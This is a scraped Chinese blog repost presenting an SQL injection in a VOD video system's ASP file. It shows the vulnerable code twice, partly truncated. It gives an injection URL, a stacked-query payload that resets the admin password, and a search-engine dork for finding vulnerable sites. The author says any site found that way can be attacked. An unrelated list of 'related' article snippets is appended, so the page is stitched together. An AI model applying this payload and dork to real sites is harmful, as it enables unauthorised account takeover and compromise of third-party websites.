狂汗!VOD点播系统漏洞解析,***电影网站!
〈!--#include file="../dbcon.inc.asp" -->
〈%
iNode_ID = Request.QueryString("id")
if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" &
else
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" &
end if
rsData.Open szSQL,con,1,3
szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"
do while not rsData.EOF
szRetVar = szRetVar & "<TypeInfo>"
szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"
szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"
szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>"
szRetVar = szRetVar & "</TypeInfo>"
rsData.MoveNext
loop
szRetVar = szRetVar & "</Root>"
rsData.Close
Response.CharSet = "GB2312"
Response.C
Response.Expires = -1
Response.Write szRetVar
%>
〈!--#include file="../dbend.inc.asp" -->
〈!--#include file="../dbcon.inc.asp" -->
〈%
iNode_ID = Request.QueryString("id")
if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" &
else
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" &
end if
rsData.Open szSQL,con,1,3
szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"
do while not rsData.EOF
szRetVar = szRetVar & "<TypeInfo>"
szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"
szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"
szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>"
szRetVar = szRetVar & "</TypeInfo>"
rsData.MoveNext
loop
szRetVar = szRetVar & "</Root>"
rsData.Close
Response.CharSet = "GB2312"
Response.C
Response.Expires = -1
Response.Write szRetVar
%>
〈!--#include file="../dbend.inc.asp" -->
很容易看出以上存在着DB权限注入
注射地址:[url]http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1[/url]
表段名:customer
构造函数 把admin的pass改成fuck
[url]http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20Userfuck=[/url]'633f94d350db34d5'%20where%20UserName='fuck'
测试方法:在google baidu搜: inurL:webmedia/ 随便找个站都可以***
官方地址:[url]http://www.viewgood.com/[/url]
转载于:https://blog.51cto.com/blacksnow/52670
狂汗!VOD点播系统漏洞解析,***电影网站!相关推荐
- 美萍VOD点播系统V8.4的制作(电影服务器)
美萍VOD点播系统V8.4标准版下载地址http://www.mpsoft.net/mpvodinst.exe 1下载安装,填写本服务器IP,及端口, 只要别和别的端口冲突就可以了,我自己用的是80, ...
- 校园局域网VOD点播系统搭建
校园局域网VOD点播系统搭建 为了解决学校播放视频对外网带宽耗费,搭建一个校园点播系统是很好的解决方案,在校内网1Gbps的基础下,通过局域网的形式搭建一个视频点播的平台,可以有效解决这一问题. 我们 ...
- 影吧VOD点播系统设计时,服务器该如何配置?
私人影院也叫影吧,是一种新型的观影方式,可以解决影院环境吵杂的现状,不仅仅可以和亲人朋友拥有独立的观影空间,还可体验到真实的影院环境.所以发展速度很快.而想要持续的获得观众的喜爱,就需要不断的更新最新 ...
- 艳辉网V1.0之VOD点播系统
1.前言 VOD (Video On Demand)即视频点播技术的简称,也称为交互式电视点播系统. 2.技术 1.mui前端点播页面 2.后台用easyui框架 3.ssh+mysql 3.实现 & ...
- 教你搭建局域网影吧vod点播系统
对于局域网电影服务器,它一般使用大量硬盘,必须考虑硬盘读取速度,尤其是许多蓝光电影对磁盘读取速度的要求更高.建议服务器上的视频通过P2P传输进行更新.例如,整个系统的提供商将拥有外部网络的中央服务器, ...
- android机顶盒点播源码,基于Android机顶盒VOD视频点播系统的设计与实现
摘要: VOD是视频点播技术(Video On Demand)的简称.本文设计的VOD点播系统客户端是以电视系统为背景,由电视机和Android机顶盒完成.采用Android机顶盒作为VOD系统的用户 ...
- 科达视频系统设置服务器,科达KDV-VS视频录像点播系统用户手册.doc
科达KDV-VS视频录像点播系统用户手册 科达KDV-VOS视频录像点播系统 用户手册 前 言 版本说明 本手册对应产品的版本为:KEDACOM视频会议系统V4.0_R3版本 读者对象 电视会议操作人 ...
- 视频点播技术android,基于Android机顶盒VOD视频点播系统的设计与实现
摘要: VOD是视频点播技术(Video On Demand)的简称.本文设计的VOD点播系统客户端是以电视系统为背景,由电视机和Android机顶盒完成.采用Android机顶盒作为VOD系统的用户 ...
- JAVA计算机毕业设计电影视频在线点播系统Mybatis+系统+数据库+调试部署
JAVA计算机毕业设计电影视频在线点播系统Mybatis+系统+数据库+调试部署 JAVA计算机毕业设计电影视频在线点播系统Mybatis+系统+数据库+调试部署 本源码技术栈: 项目架构:B/S架构 ...
最新文章
- DeepFake噩梦来了!武大阿里团队提出FakeTagger,重新识别率达95%
- c#.net URL参数传递及在js中引用
- angular元素属性绑定_【Angular】表单
- springAop源码分析
- java系统的标准输出对象_到了宋代,虽然司法证明已经发展到以物证为主,用刑讯方式逼问当事人口供在官府断案过程中却一直长期存在。...
- __declspec(novtable) 的用法
- GT sport赛道详解 - Dragon Trail | 龙之径
- 一点一点学ASP.NET之基础概念——HttpHandler
- 重启模块与及关开邮件存储设置功能页面-PHP-shell-py
- pytorch搭建TextRNN与使用案例
- Windows Server 2012 禁止使用Ctrl+Alt+Del 以及禁止开机启动服务器管理器
- 函数式编程了解一下(上)
- 谷歌浏览器开发者工具解析
- Android:单元测试InstrumentationTestRunner
- 苹果开发者三类账号说明
- matlab 偏相关系数,偏相关分析(spss偏相关性分析结果解读)
- iOS程序员自述,从月入10k到年薪百万,移动架构师如何养成的?
- 一张图解AlphaGo原理及弱点
- 如何解决MathType公式与文字不在同一行问题---已解决
- 《很杂很杂的杂学知识》 学习笔记
热门文章
- 对数坐标图python怎么画_python绘制半对数坐标
- hadoop3-求分组topn
- 2013各大公司的待遇如下
- python爬虫反爬 css 知乎 专栏_python爬虫反反爬 | 像猫眼电影、大众点评等自定义 css 加密字体怎么破?...
- DSG在国内的众多应用案例和客户列表
- 2017 Material design 第三章第一节《颜色》
- web开发权威,一个合格的初级前端工程师需要掌握的模块笔记
- app营销变现系统,让你的app更值钱!
- 【数学】二阶非齐次微分方程的解法
- python中合法的赋值语句y=y+1_关于Python赋值语句,以下选项中不合法的是 _________ 。_学小易找答案...